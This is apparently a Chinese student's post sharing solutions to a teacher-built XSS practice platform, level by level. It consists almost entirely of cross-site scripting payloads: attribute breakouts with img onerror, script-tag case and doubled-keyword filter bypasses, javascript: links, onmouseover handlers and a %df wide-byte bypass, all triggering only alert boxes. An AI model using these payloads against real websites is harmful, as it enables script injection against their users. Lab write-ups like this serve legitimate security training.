老师搭建了一个让我们练手的XSS闯关平台,在这里跟大家分享一下,希望在学XSS的同学看过之后能有收获链接如下:
http://114.115.183.86/zk/xsstest/xss_platform/code/xss01/index.php?name=chao
只要我们能使用JavaScript语言让页面出现一个弹框就算闯关成功,如果页面没能正常跳转,在URL中将xss01改成对应关卡就行
例如第8关:
xss08
1.随便在name=后面加入一句XSS测试就可以
2."> <img src=1 onerror=alert`1`>
3.'> <img src=1 onerror=alert`1`>
4."> <img src=1 onerror=alert`1`>
5."> <img src=1 onerror=alert`1`>
6."> <img src=1 onerror=alert`1`>
7."> <SCRIPT>alert`1`</SCRIPT>
8."> <SSCRIPTCRIPT>alert`1`</SSCRIPTCRIPT>
9."> <SCRIPT>alert`1`</SCRIPT> 或 "> <img src=1 ONError=alert`1`>
10." onmouseover=alert(1) //
11."> <a href=javascript:alert(1)>chao</a> 点击超链接chao
12." onmouseover=alert(1)//
13.
" onmouseover=alert`1`//
14. " onmouseover=alert`1`//
15. " onmouseover=alert`1`//
16.javaScript:alert(1)
17. javascript:alert(1)//http://
18.serach=123&&type=2"> <script>alert(1)</script>//
19.?name=xiaoming"; alert(1)//
20.在留言者这里直接写下 chao<script>alert(1)</script>
还有一个闯关题,复制下面的链接就可以
http://114.115.183.86/zk/xss_test.php?t3="
老师搭建的一个只有三个题
yi. ' onmouseover=alert(1) > //
er. %df'> <script>alert(1)</script> //
san. " onmouseover=alert(1) //